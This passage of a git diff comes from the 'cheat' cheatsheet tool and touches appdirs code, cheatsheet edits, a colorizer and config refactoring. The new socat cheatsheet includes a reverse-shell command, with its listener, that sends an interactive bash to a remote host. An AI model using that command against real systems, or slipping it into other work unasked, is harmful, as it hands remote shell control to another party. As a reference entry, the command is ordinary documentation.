"Logs" to the base app data dir for Windows, and "log" to the
|
||||||
|
base cache dir for Unix. See discussion below.
|
||||||
|
|
||||||
|
Typical user log directories are:
|
||||||
|
Mac OS X: ~/Library/Logs/<AppName>
|
||||||
|
Unix: ~/.cache/<AppName>/log # or under $XDG_CACHE_HOME if defined
|
||||||
|
Win XP: C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>\Logs
|
||||||
|
Vista: C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>\Logs
|
||||||
|
|
||||||
|
On Windows the only suggestion in the MSDN docs is that local settings
|
||||||
|
go in the `CSIDL_LOCAL_APPDATA` directory. (Note: I'm interested in
|
||||||
|
examples of what some windows apps use for a logs dir.)
|
||||||
|
|
||||||
|
OPINION: This function appends "Logs" to the `CSIDL_LOCAL_APPDATA`
|
||||||
|
value for Windows and appends "log" to the user cache dir for Unix.
|
||||||
|
This can be disabled with the `opinion=False` option.
|
||||||
|
"""
|
||||||
|
if system == "darwin":
|
||||||
|
path = os.path.join(
|
||||||
|
os.path.expanduser('~/Library/Logs'),
|
||||||
|
appname)
|
||||||
|
elif system == "win32":
|
||||||
|
path = user_data_dir(appname, appauthor, version)
|
||||||
|
version = False
|
||||||
|
if opinion:
|
||||||
|
path = os.path.join(path, "Logs")
|
||||||
|
else:
|
||||||
|
path = user_cache_dir(appname, appauthor, version)
|
||||||
|
version = False
|
||||||
|
if opinion:
|
||||||
|
path = os.path.join(path, "log")
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
class AppDirs(object):
|
||||||
|
"""Convenience wrapper for getting application dirs."""
|
||||||
|
def __init__(self, appname=None, appauthor=None, version=None,
|
||||||
|
roaming=False, multipath=False):
|
||||||
|
self.appname = appname
|
||||||
|
self.appauthor = appauthor
|
||||||
|
self.version = version
|
||||||
|
self.roaming = roaming
|
||||||
|
self.multipath = multipath
|
||||||
|
|
||||||
|
@property
|
||||||
|
def user_data_dir(self):
|
||||||
|
return user_data_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version, roaming=self.roaming)
|
||||||
|
|
||||||
|
@property
|
||||||
|
def site_data_dir(self):
|
||||||
|
return site_data_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version, multipath=self.multipath)
|
||||||
|
|
||||||
|
@property
|
||||||
|
def user_config_dir(self):
|
||||||
|
return user_config_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version, roaming=self.roaming)
|
||||||
|
|
||||||
|
@property
|
||||||
|
def site_config_dir(self):
|
||||||
|
return site_config_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version, multipath=self.multipath)
|
||||||
|
|
||||||
|
@property
|
||||||
|
def user_cache_dir(self):
|
||||||
|
return user_cache_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version)
|
||||||
|
|
||||||
|
@property
|
||||||
|
def user_state_dir(self):
|
||||||
|
return user_state_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version)
|
||||||
|
|
||||||
|
@property
|
||||||
|
def user_log_dir(self):
|
||||||
|
return user_log_dir(self.appname, self.appauthor,
|
||||||
|
version=self.version)
|
||||||
|
|
||||||
|
|
||||||
|
#---- internal support stuff
|
||||||
|
|
||||||
|
def _get_win_folder_from_registry(csidl_name):
|
||||||
|
"""This is a fallback technique at best. I'm not sure if using the
|
||||||
|
registry for this guarantees us the correct answer for all CSIDL_*
|
||||||
|
names.
|
||||||
|
"""
|
||||||
|
if PY3:
|
||||||
|
import winreg as _winreg
|
||||||
|
else:
|
||||||
|
import _winreg
|
||||||
|
|
||||||
|
shell_folder_name = {
|
||||||
|
"CSIDL_APPDATA": "AppData",
|
||||||
|
"CSIDL_COMMON_APPDATA": "Common AppData",
|
||||||
|
"CSIDL_LOCAL_APPDATA": "Local AppData",
|
||||||
|
}[csidl_name]
|
||||||
|
|
||||||
|
key = _winreg.OpenKey(
|
||||||
|
_winreg.HKEY_CURRENT_USER,
|
||||||
|
r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
|
||||||
|
)
|
||||||
|
dir, type = _winreg.QueryValueEx(key, shell_folder_name)
|
||||||
|
return dir
|
||||||
|
|
||||||
|
|
||||||
|
def _get_win_folder_with_pywin32(csidl_name):
|
||||||
|
from win32com.shell import shellcon, shell
|
||||||
|
dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0)
|
||||||
|
# Try to make this a unicode path because SHGetFolderPath does
|
||||||
|
# not return unicode strings when there is unicode data in the
|
||||||
|
# path.
|
||||||
|
try:
|
||||||
|
dir = unicode(dir)
|
||||||
|
|
||||||
|
# Downgrade to short path name if have highbit chars. See
|
||||||
|
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
|
||||||
|
has_high_char = False
|
||||||
|
for c in dir:
|
||||||
|
if ord(c) > 255:
|
||||||
|
has_high_char = True
|
||||||
|
break
|
||||||
|
if has_high_char:
|
||||||
|
try:
|
||||||
|
import win32api
|
||||||
|
dir = win32api.GetShortPathName(dir)
|
||||||
|
except ImportError:
|
||||||
|
pass
|
||||||
|
except UnicodeError:
|
||||||
|
pass
|
||||||
|
return dir
|
||||||
|
|
||||||
|
|
||||||
|
def _get_win_folder_with_ctypes(csidl_name):
|
||||||
|
import ctypes
|
||||||
|
|
||||||
|
csidl_const = {
|
||||||
|
"CSIDL_APPDATA": 26,
|
||||||
|
"CSIDL_COMMON_APPDATA": 35,
|
||||||
|
"CSIDL_LOCAL_APPDATA": 28,
|
||||||
|
}[csidl_name]
|
||||||
|
|
||||||
|
buf = ctypes.create_unicode_buffer(1024)
|
||||||
|
ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf)
|
||||||
|
|
||||||
|
# Downgrade to short path name if have highbit chars. See
|
||||||
|
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
|
||||||
|
has_high_char = False
|
||||||
|
for c in buf:
|
||||||
|
if ord(c) > 255:
|
||||||
|
has_high_char = True
|
||||||
|
break
|
||||||
|
if has_high_char:
|
||||||
|
buf2 = ctypes.create_unicode_buffer(1024)
|
||||||
|
if ctypes.windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024):
|
||||||
|
buf = buf2
|
||||||
|
|
||||||
|
return buf.value
|
||||||
|
|
||||||
|
def _get_win_folder_with_jna(csidl_name):
|
||||||
|
import array
|
||||||
|
from com.sun import jna
|
||||||
|
from com.sun.jna.platform import win32
|
||||||
|
|
||||||
|
buf_size = win32.WinDef.MAX_PATH * 2
|
||||||
|
buf = array.zeros('c', buf_size)
|
||||||
|
shell = win32.Shell32.INSTANCE
|
||||||
|
shell.SHGetFolderPath(None, getattr(win32.ShlObj, csidl_name), None, win32.ShlObj.SHGFP_TYPE_CURRENT, buf)
|
||||||
|
dir = jna.Native.toString(buf.tostring()).rstrip("\0")
|
||||||
|
|
||||||
|
# Downgrade to short path name if have highbit chars. See
|
||||||
|
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
|
||||||
|
has_high_char = False
|
||||||
|
for c in dir:
|
||||||
|
if ord(c) > 255:
|
||||||
|
has_high_char = True
|
||||||
|
break
|
||||||
|
if has_high_char:
|
||||||
|
buf = array.zeros('c', buf_size)
|
||||||
|
kernel = win32.Kernel32.INSTANCE
|
||||||
|
if kernel.GetShortPathName(dir, buf, buf_size):
|
||||||
|
dir = jna.Native.toString(buf.tostring()).rstrip("\0")
|
||||||
|
|
||||||
|
return dir
|
||||||
|
|
||||||
|
if system == "win32":
|
||||||
|
try:
|
||||||
|
import win32com.shell
|
||||||
|
_get_win_folder = _get_win_folder_with_pywin32
|
||||||
|
except ImportError:
|
||||||
|
try:
|
||||||
|
from ctypes import windll
|
||||||
|
_get_win_folder = _get_win_folder_with_ctypes
|
||||||
|
except ImportError:
|
||||||
|
try:
|
||||||
|
import com.sun.jna
|
||||||
|
_get_win_folder = _get_win_folder_with_jna
|
||||||
|
except ImportError:
|
||||||
|
_get_win_folder = _get_win_folder_from_registry
|
||||||
|
|
||||||
|
|
||||||
|
#---- self test code
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
appname = "MyApp"
|
||||||
|
appauthor = "MyCompany"
|
||||||
|
|
||||||
|
props = ("user_data_dir",
|
||||||
|
"user_config_dir",
|
||||||
|
"user_cache_dir",
|
||||||
|
"user_state_dir",
|
||||||
|
"user_log_dir",
|
||||||
|
"site_data_dir",
|
||||||
|
"site_config_dir")
|
||||||
|
|
||||||
|
print("-- app dirs %s --" % __version__)
|
||||||
|
|
||||||
|
print("-- app dirs (with optional 'version')")
|
||||||
|
dirs = AppDirs(appname, appauthor, version="1.0")
|
||||||
|
for prop in props:
|
||||||
|
print("%s: %s" % (prop, getattr(dirs, prop)))
|
||||||
|
|
||||||
|
print("\n-- app dirs (without optional 'version')")
|
||||||
|
dirs = AppDirs(appname, appauthor)
|
||||||
|
for prop in props:
|
||||||
|
print("%s: %s" % (prop, getattr(dirs, prop)))
|
||||||
|
|
||||||
|
print("\n-- app dirs (without optional 'appauthor')")
|
||||||
|
dirs = AppDirs(appname)
|
||||||
|
for prop in props:
|
||||||
|
print("%s: %s" % (prop, getattr(dirs, prop)))
|
||||||
|
|
||||||
|
print("\n-- app dirs (with disabled 'appauthor')")
|
||||||
|
dirs = AppDirs(appname, appauthor=False)
|
||||||
|
for prop in props:
|
||||||
|
print("%s: %s" % (prop, getattr(dirs, prop)))
|
@ -5,7 +5,7 @@ dpkg -i test.deb
|
|||||||
dpkg -P test.deb
|
dpkg -P test.deb
|
||||||
|
|
||||||
# List all installed packages with versions and details
|
# List all installed packages with versions and details
|
||||||
dpkg -I
|
dpkg -l
|
||||||
|
|
||||||
# Find out if a Debian package is installed or not
|
# Find out if a Debian package is installed or not
|
||||||
dpkg -s test.deb | grep Status
|
dpkg -s test.deb | grep Status
|
||||||
|
@ -6,59 +6,59 @@
|
|||||||
# Basic usage
|
# Basic usage
|
||||||
|
|
||||||
Indent Select text then press TAB
|
Indent Select text then press TAB
|
||||||
Cut CTRL-w
|
Cut C-w
|
||||||
Copy ALT-w
|
Copy M-w
|
||||||
Paste ("yank") CTRL-y
|
Paste ("yank") C-y
|
||||||
Begin selection CTRL-SPACE
|
Begin selection C-SPACE
|
||||||
Search/Find CTRL-s
|
Search/Find C-s
|
||||||
Replace ALT-% (ALT-SHIFT-5)
|
Replace M-% (M-SHIFT-5)
|
||||||
Save CTRL-x CTRL-s
|
Save C-x C-s
|
||||||
Save as CTRL-x CTRL-w
|
Save as C-x C-w
|
||||||
Load/Open CTRL-x CTRL-f
|
Load/Open C-x C-f
|
||||||
Undo CTRL-x u
|
Undo C-x u
|
||||||
Highlight all text CTRL-x h
|
Highlight all text C-x h
|
||||||
Directory listing CTRL-x d
|
Directory listing C-x d
|
||||||
Cancel a command CTRL-g
|
Cancel a command C-g
|
||||||
Font size bigger CTRL-x CTRL-+
|
Font size bigger C-x C-+
|
||||||
Font size smaller CTRL-x CTRL--
|
Font size smaller C-x C--
|
||||||
|
|
||||||
# Buffers
|
# Buffers
|
||||||
|
|
||||||
Split screen vertically CTRL-x 2
|
Split screen vertically C-x 2
|
||||||
Split screen vertically with 5 row height CTRL-u 5 CTRL-x 2
|
Split screen vertically with 5 row height C-u 5 C-x 2
|
||||||
Split screen horizontally CTRL-x 3
|
Split screen horizontally C-x 3
|
||||||
Split screen horizontally with 24 column width CTRL-u 24 CTRL-x 3
|
Split screen horizontally with 24 column width C-u 24 C-x 3
|
||||||
Revert to single screen CTRL-x 1
|
Revert to single screen C-x 1
|
||||||
Hide the current screen CTRL-x 0
|
Hide the current screen C-x 0
|
||||||
Move to the next screen CTRL-x o
|
Move to the next screen C-x o
|
||||||
Kill the current buffer CTRL-x k
|
Kill the current buffer C-x k
|
||||||
Select a buffer CTRL-x b
|
Select a buffer C-x b
|
||||||
Run command in the scratch buffer CTRL-x CTRL-e
|
Run command in the scratch buffer C-x C-e
|
||||||
|
|
||||||
# Navigation ( backward / forward )
|
# Navigation ( backward / forward )
|
||||||
|
|
||||||
Character-wise CTRL-b , CTRL-f
|
Character-wise C-b , C-f
|
||||||
Word-wise ALT-b , ALT-f
|
Word-wise M-b , M-f
|
||||||
Line-wise CTRL-p , CTRL-n
|
Line-wise C-p , C-n
|
||||||
Sentence-wise ALT-a , ALT-e
|
Sentence-wise M-a , M-e
|
||||||
Paragraph-wise ALT-{ , ALT-}
|
Paragraph-wise M-{ , M-}
|
||||||
Function-wise CTRL-ALT-a , CTRL-ALT-e
|
Function-wise C-M-a , C-M-e
|
||||||
Line beginning / end CTRL-a , CTRL-e
|
Line beginning / end C-a , C-e
|
||||||
|
|
||||||
# Other stuff
|
# Other stuff
|
||||||
|
|
||||||
Open a shell ALT-x eshell
|
Open a shell M-x eshell
|
||||||
Goto a line number ALT-x goto-line
|
Goto a line number M-x goto-line
|
||||||
Word wrap ALT-x toggle-word-wrap
|
Word wrap M-x toggle-word-wrap
|
||||||
Spell checking ALT-x flyspell-mode
|
Spell checking M-x flyspell-mode
|
||||||
Line numbers ALT-x linum-mode
|
Line numbers M-x linum-mode
|
||||||
Toggle line wrap ALT-x visual-line-mode
|
Toggle line wrap M-x visual-line-mode
|
||||||
Compile some code ALT-x compile
|
Compile some code M-x compile
|
||||||
List packages ALT-x package-list-packages
|
List packages M-x package-list-packages
|
||||||
|
|
||||||
# Line numbers
|
# Line numbers
|
||||||
|
|
||||||
To add line numbers and enable moving to a line with CTRL-l:
|
To add line numbers and enable moving to a line with C-l:
|
||||||
|
|
||||||
(global-set-key "\C-l" 'goto-line)
|
(global-set-key "\C-l" 'goto-line)
|
||||||
(add-hook 'find-file-hook (lambda () (linum-mode 1)))
|
(add-hook 'find-file-hook (lambda () (linum-mode 1)))
|
||||||
|
@ -10,7 +10,7 @@ gcc -g
|
|||||||
# Debug with all symbols.
|
# Debug with all symbols.
|
||||||
gcc -ggdb3
|
gcc -ggdb3
|
||||||
|
|
||||||
# Build for 64 bytes
|
# Build for 64 bits
|
||||||
gcc -m64
|
gcc -m64
|
||||||
|
|
||||||
# Include the directory {/usr/include/myPersonnal/lib/} to the list of path for #include <....>
|
# Include the directory {/usr/include/myPersonnal/lib/} to the list of path for #include <....>
|
||||||
|
@ -18,11 +18,11 @@ sudo netstat -vtlnp --listening -4
|
|||||||
# Replace it by:
|
# Replace it by:
|
||||||
ss
|
ss
|
||||||
|
|
||||||
# For netstat-r
|
# For netstat -r
|
||||||
ip route
|
ip route
|
||||||
|
|
||||||
# For netstat -i
|
# For netstat -i
|
||||||
ip -s link
|
ip -s link
|
||||||
|
|
||||||
# For netstat-g
|
# For netstat -g
|
||||||
ip maddr
|
ip maddr
|
||||||
|
@ -67,3 +67,38 @@ nmap -T5 --min-parallelism=50 -n --script "ssl-heartbleed" -pT:443 127.0.0.1
|
|||||||
|
|
||||||
# Show all informations (debug mode)
|
# Show all informations (debug mode)
|
||||||
nmap -d ...
|
nmap -d ...
|
||||||
|
|
||||||
|
## Port Status Information
|
||||||
|
- Open: This indicates that an application is listening for connections on this port.
|
||||||
|
- Closed: This indicates that the probes were received but there is no application listening on this port.
|
||||||
|
- Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
|
||||||
|
- Unfiltered: This indicates that the probes were received but a state could not be established.
|
||||||
|
- Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.
|
||||||
|
- Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.
|
||||||
|
|
||||||
|
## Additional Scan Types
|
||||||
|
|
||||||
|
nmap -sn: Probe only (host discovery, not port scan)
|
||||||
|
nmap -sS: SYN Scan
|
||||||
|
nmap -sT: TCP Connect Scan
|
||||||
|
nmap -sU: UDP Scan
|
||||||
|
nmap -sV: Version Scan
|
||||||
|
nmap -O: Used for OS Detection/fingerprinting
|
||||||
|
nmap --scanflags: Sets custom list of TCP using `URG ACK PSH RST SYN FIN` in any order
|
||||||
|
|
||||||
|
### Nmap Scripting Engine Categories
|
||||||
|
The most common Nmap scripting engine categories:
|
||||||
|
- auth: Utilize credentials or bypass authentication on target hosts.
|
||||||
|
- broadcast: Discover hosts not included on command line by broadcasting on local network.
|
||||||
|
- brute: Attempt to guess passwords on target systems, for a variety of protocols, including http, SNMP, IAX, MySQL, VNC, etc.
|
||||||
|
- default: Scripts run automatically when -sC or -A are used.
|
||||||
|
- discovery: Try to learn more information about target hosts through public sources of information, SNMP, directory services, and more.
|
||||||
|
- dos: May cause denial of service conditions in target hosts.
|
||||||
|
- exploit: Attempt to exploit target systems.
|
||||||
|
- external: Interact with third-party systems not included in target list.
|
||||||
|
- fuzzer: Send unexpected input in network protocol fields.
|
||||||
|
- intrusive: May crash target, consume excessive resources, or otherwise impact target machines in a malicious fashion.
|
||||||
|
- malware: Look for signs of malware infection on the target hosts.
|
||||||
|
- safe: Designed not to impact target in a negative fashion.
|
||||||
|
- version: Measure the version of software or protocols on the target hosts.
|
||||||
|
- vul: Measure whether target systems have a known vulnerability.
|
||||||
|
@ -16,8 +16,9 @@ psql -U postgres -d dbName -c 'select * from tableName;' -o fileName
|
|||||||
# Execute query and get tabular html output:
|
# Execute query and get tabular html output:
|
||||||
psql -U postgres -d dbName -H -c 'select * from tableName;'
|
psql -U postgres -d dbName -H -c 'select * from tableName;'
|
||||||
|
|
||||||
# Execute query and save resulting rows to csv file:
|
# Execute query and save resulting rows to csv file
|
||||||
psql -U postgres -d dbName -t -A -P fieldsep=',' -c 'select * from tableName;' -o fileName.csv
|
# (if column names in the first row are not needed, remove the word 'header'):
|
||||||
|
psql -U postgres -d dbName -c 'copy (select * from tableName) to stdout with csv header;' -o fileName.csv
|
||||||
|
|
||||||
# Read commands from file:
|
# Read commands from file:
|
||||||
psql -f fileName
|
psql -f fileName
|
||||||
|
@ -1,2 +1,5 @@
|
|||||||
# Lowercase all files and folders in current directory
|
# Lowercase all files and folders in current directory
|
||||||
rename 'y/A-Z/a-z/' *
|
rename 'y/A-Z/a-z/' *
|
||||||
|
|
||||||
|
# Replace 'sometext' with 'replacedby' in all files in current directory
|
||||||
|
rename 's/sometext/replacedby/' *
|
||||||
|
37
cheat/cheatsheets/socat
Normal file
37
cheat/cheatsheets/socat
Normal file
@ -0,0 +1,37 @@
|
|||||||
|
# socat connect to http-server (port 80 on 'butzel.info')
|
||||||
|
socat TCP4:butzel.info:80 -
|
||||||
|
|
||||||
|
# connect to https-server (port 443 on 'butzel.info' with tls)
|
||||||
|
socat openssl:butzel.info:443 -
|
||||||
|
|
||||||
|
# tcp-listener (port 3180), output as hexdump (-x) and fork for new connetions
|
||||||
|
socat -x tcp-listen:3180,fork -
|
||||||
|
|
||||||
|
# practical examples:
|
||||||
|
|
||||||
|
# complete real working http-example:
|
||||||
|
# (sleep is necessary to prevent socat closing socket before data received)
|
||||||
|
(echo -e "GET / HTTP/1.1\r\nHost: butzel.info\r\n\r" && sleep 1) \
|
||||||
|
| socat tcp4:butzel.info:80 -
|
||||||
|
|
||||||
|
# http to httpS 'Proxy' (for an webserver without TLS-Support)
|
||||||
|
socat OPENSSL-LISTEN:443,reuseaddr,pf=ip4,fork,cert=server.pem,cafile=client.crt,verify=0 TCP4-CONNECT:127.0.0.1:80
|
||||||
|
|
||||||
|
# port forwarding (e.g. own port 3180 to port 22(ssh) on target
|
||||||
|
socat TCP4-LISTEN:3180,reuseaddr,fork TCP4:butzel.info:ssh
|
||||||
|
|
||||||
|
# TOR-forwarding (needs tor-daemon on port 9050 running)
|
||||||
|
socat tcp4-listen:8080,reuseaddr,fork socks4A:127.0.0.1:t0rhidd3ns3rvice.onion:80,socksport=9050
|
||||||
|
|
||||||
|
# network (port 8266) to serial bridge (/dev/ttyUSB0 baudrate: 115200)
|
||||||
|
socat TCP4-LISTEN:8266,fork,reuseaddr /dev/ttyUSB0,raw,crnl,b115200
|
||||||
|
|
||||||
|
# udp to tcp
|
||||||
|
socat -u udp-recvfrom:1234,fork tcp:localhost:4321
|
||||||
|
|
||||||
|
# reverse shell:
|
||||||
|
socat exec:'bash -i',pty,stderr tcp:remote.butzel.info:3180
|
||||||
|
|
||||||
|
# listener for above reverse shell (on remote.butzel.info):
|
||||||
|
socat file:`tty`,raw,echo=0 tcp-listen:3180
|
||||||
|
# or: nc -lp 3180
|
@ -10,6 +10,9 @@ sqlite3 example.db "INSERT INTO 'Os' VALUES(1,'Linux',1991);"
|
|||||||
# list tables
|
# list tables
|
||||||
sqlite3 example.db ".tables"
|
sqlite3 example.db ".tables"
|
||||||
|
|
||||||
|
# describe table
|
||||||
|
sqlite3 example.db ".schema 'Os'"
|
||||||
|
|
||||||
# view records in table
|
# view records in table
|
||||||
sqlite3 example.db "SELECT * FROM 'Os';"
|
sqlite3 example.db "SELECT * FROM 'Os';"
|
||||||
|
|
||||||
|
@ -21,7 +21,7 @@ ssh -f -L 8080:remote.example.com:5000 user@personal.server.com -N
|
|||||||
ssh -X -t user@example.com 'chromium-browser'
|
ssh -X -t user@example.com 'chromium-browser'
|
||||||
|
|
||||||
# To create a SOCKS proxy on localhost and port 9999
|
# To create a SOCKS proxy on localhost and port 9999
|
||||||
ssh -D 9999 user@example.com
|
ssh -qND 9999 user@example.com
|
||||||
|
|
||||||
# To tunnel an ssh session over the SOCKS proxy on localhost and port 9999
|
# To tunnel an ssh session over the SOCKS proxy on localhost and port 9999
|
||||||
ssh -o "ProxyCommand nc -x 127.0.0.1:9999 -X 4 %h %p" username@example2.com
|
ssh -o "ProxyCommand nc -x 127.0.0.1:9999 -X 4 %h %p" username@example2.com
|
||||||
|
@ -12,3 +12,9 @@ ssh-keygen -p -P old_passphrase -N '' -f /path/to/keyfile
|
|||||||
|
|
||||||
# To generate a 4096 bit RSA key with a passphase and comment containing the user and hostname
|
# To generate a 4096 bit RSA key with a passphase and comment containing the user and hostname
|
||||||
ssh-keygen -t rsa -b 4096 -C "$USER@$HOSTNAME" -P passphrase
|
ssh-keygen -t rsa -b 4096 -C "$USER@$HOSTNAME" -P passphrase
|
||||||
|
|
||||||
|
# To print the fingerprint of a public key
|
||||||
|
ssh-keygen -lf /path/to/keyfile
|
||||||
|
|
||||||
|
# To print the Github-style (MD5) fingerprint of a public key
|
||||||
|
ssh-keygen -E md5 -lf /path/to/keyfile
|
||||||
|
@ -51,3 +51,6 @@ Ctrl-b %
|
|||||||
|
|
||||||
# Split windows vertically:
|
# Split windows vertically:
|
||||||
Ctrl-b "
|
Ctrl-b "
|
||||||
|
|
||||||
|
# Swap windows
|
||||||
|
Ctrl-b :swap-window -s [0-9] -t [0-9]
|
||||||
|
@ -30,4 +30,4 @@ vagrant suspend
|
|||||||
vagrant destroy
|
vagrant destroy
|
||||||
|
|
||||||
# Restart vm with new provision script
|
# Restart vm with new provision script
|
||||||
vagran reload --provision
|
vagrant reload --provision
|
||||||
|
@ -63,3 +63,18 @@ d{motion} delete text that {motion} moves over
|
|||||||
2dw deletes 2 words
|
2dw deletes 2 words
|
||||||
5yy copies 5 lines
|
5yy copies 5 lines
|
||||||
42G go to line 42
|
42G go to line 42
|
||||||
|
|
||||||
|
# Multiple windows
|
||||||
|
:e filename - edit another file
|
||||||
|
:split filename - split window and load another file
|
||||||
|
ctrl-w up arrow - move cursor up a window
|
||||||
|
ctrl-w ctrl-w - move cursor to another window (cycle)
|
||||||
|
ctrl-w_ - maximize current window
|
||||||
|
ctrl-w= - make all equal size
|
||||||
|
10 ctrl-w+ - increase window size by 10 lines
|
||||||
|
:vsplit file - vertical split
|
||||||
|
:sview file - same as split, but readonly
|
||||||
|
:hide - close current window
|
||||||
|
:only - keep only this window open
|
||||||
|
:ls - show current buffers
|
||||||
|
:b 2 - open buffer #2 in this window
|
||||||
|
@ -19,5 +19,5 @@ youtube-dl -s example.com/watch?v=id
|
|||||||
# To download audio in mp3 format with best quality available
|
# To download audio in mp3 format with best quality available
|
||||||
youtube-dl --extract-audio --audio-format mp3 --audio-quality 0 example.com/watch?v=id
|
youtube-dl --extract-audio --audio-format mp3 --audio-quality 0 example.com/watch?v=id
|
||||||
|
|
||||||
# For all video formats see
|
# For all video formats see link below (unfold "Comparison of YouTube media encoding options")
|
||||||
# http://en.wikipedia.org/wiki/YouTube#Quality_and_codecs
|
# https://en.wikipedia.org/w/index.php?title=YouTube&oldid=723160791#Quality_and_formats
|
||||||
|
14
cheat/cheatsheets/z
Normal file
14
cheat/cheatsheets/z
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
# To `cd` to most frecent dir matching `foo`
|
||||||
|
z foo
|
||||||
|
|
||||||
|
# To `cd` to most frecent dir matching `foo`, then `bar`
|
||||||
|
z foo bar
|
||||||
|
|
||||||
|
# To `cd` to highest ranked dir matching `foo`
|
||||||
|
z -r foo
|
||||||
|
|
||||||
|
# To `cd` to most recently accessed dir matching `foo`
|
||||||
|
z -t foo
|
||||||
|
|
||||||
|
# To list all dirs matching `foo` - By frecency
|
||||||
|
z -l foo
|
@ -1,6 +1,9 @@
|
|||||||
# Create zip file
|
# Create zip file
|
||||||
zip archive.zip file1 directory/
|
zip archive.zip file1 directory/
|
||||||
|
|
||||||
|
# Create zip file from directory
|
||||||
|
zip -r archive.zip directory/
|
||||||
|
|
||||||
# Create zip file with password
|
# Create zip file with password
|
||||||
zip -P password archive.zip file1
|
zip -P password archive.zip file1
|
||||||
|
|
||||||
|
65
cheat/colorize.py
Normal file
65
cheat/colorize.py
Normal file
@ -0,0 +1,65 @@
|
|||||||
|
from __future__ import print_function
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
class Colorize:
|
||||||
|
|
||||||
|
def __init__(self, config):
|
||||||
|
self._config = config
|
||||||
|
|
||||||
|
def search(self, needle, haystack):
|
||||||
|
""" Colorizes search results matched within a line """
|
||||||
|
|
||||||
|
# if a highlight color is not configured, exit early
|
||||||
|
if not self._config.cheat_highlight:
|
||||||
|
return haystack
|
||||||
|
|
||||||
|
# otherwise, attempt to import the termcolor library
|
||||||
|
try:
|
||||||
|
from termcolor import colored
|
||||||
|
|
||||||
|
# if the import fails, return uncolored text
|
||||||
|
except ImportError:
|
||||||
|
return haystack
|
||||||
|
|
||||||
|
# if the import succeeds, colorize the needle in haystack
|
||||||
|
return haystack.replace(needle,
|
||||||
|
colored(needle, self._config.cheat_highlight))
|
||||||
|
|
||||||
|
def syntax(self, sheet_content):
|
||||||
|
""" Applies syntax highlighting """
|
||||||
|
|
||||||
|
# only colorize if cheat_colors is true, and stdout is a tty
|
||||||
|
if self._config.cheat_colors is False or not sys.stdout.isatty():
|
||||||
|
return sheet_content
|
||||||
|
|
||||||
|
# don't attempt to colorize an empty cheatsheet
|
||||||
|
if not sheet_content.strip():
|
||||||
|
return ""
|
||||||
|
|
||||||
|
# otherwise, attempt to import the pygments library
|
||||||
|
try:
|
||||||
|
from pygments import highlight
|
||||||
|
from pygments.lexers import get_lexer_by_name
|
||||||
|
from pygments.formatters import TerminalFormatter
|
||||||
|
|
||||||
|
# if the import fails, return uncolored text
|
||||||
|
except ImportError:
|
||||||
|
return sheet_content
|
||||||
|
|
||||||
|
# otherwise, attempt to colorize
|
||||||
|
first_line = sheet_content.splitlines()[0]
|
||||||
|
lexer = get_lexer_by_name('bash')
|
||||||
|
|
||||||
|
# apply syntax-highlighting if the first line is a code-fence
|
||||||
|
if first_line.startswith('```'):
|
||||||
|
sheet_content = '\n'.join(sheet_content.split('\n')[1:-2])
|
||||||
|
try:
|
||||||
|
lexer = get_lexer_by_name(first_line[3:])
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
|
return highlight(
|
||||||
|
sheet_content,
|
||||||
|
lexer,
|
||||||
|
TerminalFormatter(bg=self._config.cheat_colorscheme))
|
@ -1,134 +1,119 @@
|
|||||||
import os
|
|
||||||
from cheat.utils import Utils
|
from cheat.utils import Utils
|
||||||
|
import cheat.appdirs as appdirs
|
||||||
import json
|
import json
|
||||||
|
import os
|
||||||
|
|
||||||
|
|
||||||
class Configuration:
|
class Configuration:
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self._get_global_conf_file_path()
|
# compute the location of the config files
|
||||||
self._get_local_conf_file_path()
|
config_file_path_global = self._select([
|
||||||
self._saved_configuration = self._get_configuration()
|
os.environ.get('CHEAT_GLOBAL_CONF_PATH'),
|
||||||
|
appdirs.site_config_dir('cheat', 'cheat'),
|
||||||
def _get_configuration(self):
|
])
|
||||||
# get options from config files and environment vairables
|
config_file_path_local = self._select([
|
||||||
merged_config = {}
|
os.environ.get('CHEAT_LOCAL_CONF_PATH'),
|
||||||
|
appdirs.user_config_dir('cheat', 'cheat'),
|
||||||
|
])
|
||||||
|
|
||||||
|
# attempt to read the global config file
|
||||||
|
config = {}
|
||||||
try:
|
try:
|
||||||
merged_config.update(
|
config.update(self._read_config_file(config_file_path_global))
|
||||||
self._read_configuration_file(self.glob_config_path)
|
|
||||||
)
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Utils.warn('error while parsing global configuration Reason: '
|
Utils.warn('Error while parsing global configuration: '
|
||||||
+ e.message
|
+ e.message)
|
||||||
)
|
|
||||||
|
|
||||||
|
# attempt to read the local config file
|
||||||
try:
|
try:
|
||||||
merged_config.update(
|
config.update(self._read_config_file(config_file_path_local))
|
||||||
self._read_configuration_file(self.local_config_path)
|
|
||||||
)
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Utils.warn('error while parsing user configuration Reason: '
|
Utils.warn('Error while parsing local configuration: ' + e.message)
|
||||||
+ e.message
|
|
||||||
)
|
|
||||||
|
|
||||||
merged_config.update(self._read_env_vars_config())
|
# With config files read, now begin to apply envvar overrides and
|
||||||
|
# default values
|
